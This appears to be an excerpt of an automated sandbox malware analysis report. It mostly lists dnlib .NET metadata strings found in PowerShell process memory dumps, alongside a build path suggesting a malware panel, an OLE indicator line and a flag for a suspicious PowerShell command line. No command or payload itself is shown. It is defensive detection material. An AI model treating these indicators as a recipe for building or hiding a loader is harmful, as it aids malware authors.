                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.400851286.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.398638126.00000000038E9000.00000004.00000800.00020000.00000000.sdmp
                Source: ~WRF{0230E32B-C301-4FA6-B113-F550CB612E0B}.tmp.0.drInitial sample: OLE indicators vbamacros = False

                Data Obfuscation

                barindex
                Suspicious powershell command line found
